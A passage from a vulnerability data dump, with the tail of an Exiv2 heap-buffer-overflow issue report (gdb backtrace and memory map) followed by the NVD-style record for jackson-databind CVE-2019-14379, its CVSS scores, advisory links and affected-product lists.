#7 0x000055555555e304 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe578) at /home/tim/exiv2/src/exiv2.cpp:77
#8 0x00007ffff6f64b97 in __libc_start_main (main=0x55555555e100 <main(int, char* const*)>, argc=0x2, argv=0x7fffffffe578, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe568) at ../csu/libc-start.c:310
#9 0x000055555555e6da in _start ()
gdb-peda$ vmmap
Start End Perm Name
0x0000555555554000 0x0000555555597000 r-xp /home/tim/fuzz/exiv2/exiv2
0x0000555555796000 0x0000555555798000 r--p /home/tim/fuzz/exiv2/exiv2
0x0000555555798000 0x0000555555799000 rw-p /home/tim/fuzz/exiv2/exiv2
0x0000555555799000 0x00005555557ba000 rw-p [heap]
0x00007ffff5b67000 0x00007ffff6536000 r--p /usr/lib/locale/locale-archive
0x00007ffff6536000 0x00007ffff66d3000 r-xp /lib/x86_64-linux-gnu/libm-2.27.so
0x00007ffff66d3000 0x00007ffff68d2000 ---p /lib/x86_64-linux-gnu/libm-2.27.so
0x00007ffff68d2000 0x00007ffff68d3000 r--p /lib/x86_64-linux-gnu/libm-2.27.so
0x00007ffff68d3000 0x00007ffff68d4000 rw-p /lib/x86_64-linux-gnu/libm-2.27.so
0x00007ffff68d4000 0x00007ffff68ee000 r-xp /lib/x86_64-linux-gnu/libpthread-2.27.so
0x00007ffff68ee000 0x00007ffff6aed000 ---p /lib/x86_64-linux-gnu/libpthread-2.27.so
0x00007ffff6aed000 0x00007ffff6aee000 r--p /lib/x86_64-linux-gnu/libpthread-2.27.so
0x00007ffff6aee000 0x00007ffff6aef000 rw-p /lib/x86_64-linux-gnu/libpthread-2.27.so
0x00007ffff6aef000 0x00007ffff6af3000 rw-p mapped
0x00007ffff6af3000 0x00007ffff6b22000 r-xp /lib/x86_64-linux-gnu/libexpat.so.1.6.7
0x00007ffff6b22000 0x00007ffff6d22000 ---p /lib/x86_64-linux-gnu/libexpat.so.1.6.7
0x00007ffff6d22000 0x00007ffff6d24000 r--p /lib/x86_64-linux-gnu/libexpat.so.1.6.7
0x00007ffff6d24000 0x00007ffff6d25000 rw-p /lib/x86_64-linux-gnu/libexpat.so.1.6.7
0x00007ffff6d25000 0x00007ffff6d41000 r-xp /usr/local/lib/libz.so.1.2.11
0x00007ffff6d41000 0x00007ffff6f41000 ---p /usr/local/lib/libz.so.1.2.11
0x00007ffff6f41000 0x00007ffff6f42000 r--p /usr/local/lib/libz.so.1.2.11
0x00007ffff6f42000 0x00007ffff6f43000 rw-p /usr/local/lib/libz.so.1.2.11
0x00007ffff6f43000 0x00007ffff712a000 r-xp /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff712a000 0x00007ffff732a000 ---p /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff732a000 0x00007ffff732e000 r--p /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff732e000 0x00007ffff7330000 rw-p /lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7330000 0x00007ffff7334000 rw-p mapped
0x00007ffff7334000 0x00007ffff734b000 r-xp /lib/x86_64-linux-gnu/libgcc_s.so.1
0x00007ffff734b000 0x00007ffff754a000 ---p /lib/x86_64-linux-gnu/libgcc_s.so.1
0x00007ffff754a000 0x00007ffff754b000 r--p /lib/x86_64-linux-gnu/libgcc_s.so.1
0x00007ffff754b000 0x00007ffff754c000 rw-p /lib/x86_64-linux-gnu/libgcc_s.so.1
0x00007ffff754c000 0x00007ffff76c5000 r-xp /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x00007ffff76c5000 0x00007ffff78c5000 ---p /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x00007ffff78c5000 0x00007ffff78cf000 r--p /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x00007ffff78cf000 0x00007ffff78d1000 rw-p /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25
0x00007ffff78d1000 0x00007ffff78d5000 rw-p mapped
0x00007ffff78d5000 0x00007ffff7b86000 r-xp /home/tim/exiv2/build/lib/libexiv2.so.0.27.99.0
0x00007ffff7b86000 0x00007ffff7d85000 ---p /home/tim/exiv2/build/lib/libexiv2.so.0.27.99.0
0x00007ffff7d85000 0x00007ffff7db7000 r--p /home/tim/exiv2/build/lib/libexiv2.so.0.27.99.0
0x00007ffff7db7000 0x00007ffff7dba000 rw-p /home/tim/exiv2/build/lib/libexiv2.so.0.27.99.0
0x00007ffff7dba000 0x00007ffff7dd5000 rw-p mapped
0x00007ffff7dd5000 0x00007ffff7dfc000 r-xp /lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7fda000 0x00007ffff7fe0000 rw-p mapped
0x00007ffff7ff5000 0x00007ffff7ff7000 rw-p mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p /lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p /lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p [stack]
0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
```
**Desktop (please complete the following information):**
- ubuntu18
- gcc 7.4.0
- -fsanitize=address -g
| heap-buffer-overflow in Exiv2::MrwImage::readMetadata() | https://api.github.com/repos/Exiv2/exiv2/issues/954/comments | 4 | 2019-07-12T06:36:56Z | 2019-07-22T09:36:16Z | https://github.com/Exiv2/exiv2/issues/954 | 467,246,598 | 954 |
CVE-2019-14379 | 2019-07-29T12:15:16.633 | SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:2824"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2743"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2935"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2936"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2937"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2938"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2998"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3044"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3045"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3046"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3050"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3200"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3292"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3297"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3901"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2020:0727"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2387"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69%40%3Ccommits.tinkerpop.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/2766188be238a446a250ef76801037d452979152d85bce5e46805815%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/525bcf949a4b0da87a375cbad2680b8beccde749522f24c49befe7fb%40%3Ccommits.pulsar.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/6788e4c991f75b89d290ad06b463fcd30bcae99fee610345a35b7bc6%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/689c6bcc6c7612eee71e453a115a4c8581e7b718537025d4b265783d%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/75f482fdc84abe6d0c8f438a76437c335a7bbeb5cddd4d70b4bc0cbf%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/859815b2e9f1575acbb2b260b73861c16ca49bca627fa0c46419051f%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/8723b52c2544e6cb804bc8a36622c584acd1bd6c53f2b6034c9fea54%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef%40%3Cdev.struts.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/99944f86abefde389da9b4040ea2327c6aa0b53a2ff9352bd4cfec17%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/d161ff3d59c5a8213400dd6afb1cce1fac4f687c32d1e0c0bfbfaa2d%40%3Cissues.iceberg.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/e25e734c315f70d8876a846926cfe3bfa1a4888044f146e844caf72f%40%3Ccommits.ambari.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be%40%3Cdev.tomee.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f17f63b0f8a57e4a5759e01d25cffc0548f0b61ff5c6bfd704ad2f2a%40%3Ccommits.ambari.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00011.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190814-0001/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT213189"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "89660FC3-9198-414C-B89D-C61A4438BA3B",
"versionEndExcluding": "2.7.9.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB8A2D4-0FDE-4216-896B-52824106B97B",
"versionEndExcluding": "2.8.11.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "04641592-DAF4-47BB-A9DE-FC4C84A20401",
"versionEndExcluding": "2.9.9.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*",
"matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*",
"matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "9.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7081652A-D28B-494E-94EF-CA88117F23EE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*",
"matchCriteriaId": "D100F7CE-FC64-4CC6-852A-6136D72DA419",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*",
"matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:single_sign-on:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E939A0E0-3437-459E-9FAB-FE42811B1D32",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:single_sign-on:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E939A0E0-3437-459E-9FAB-FE42811B1D32",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:single_sign-on:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "E939A0E0-3437-459E-9FAB-FE42811B1D32",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C2BEE49E-A5AA-42D3-B422-460454505480",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F4FF66F7-10C8-4A1C-910A-EF7D12A4284C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "35AD0C07-9688-4397-8D45-FBB88C0F0C11",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8972497F-6E24-45A9-9A18-EB0E842CB1D4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "400509A8-D6F2-432C-A2F1-AD5B8778D0D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "282150FF-C945-4A3E-8A80-E8757A8907EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A9317C01-22AA-452B-BBBF-5FAFFFB8BEA4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C4534CF9-D9FD-4936-9D8C-077387028A05",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*",
"matchCriteriaId": "D60384BD-284C-4A68-9EEF-0FAFDF0C21F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
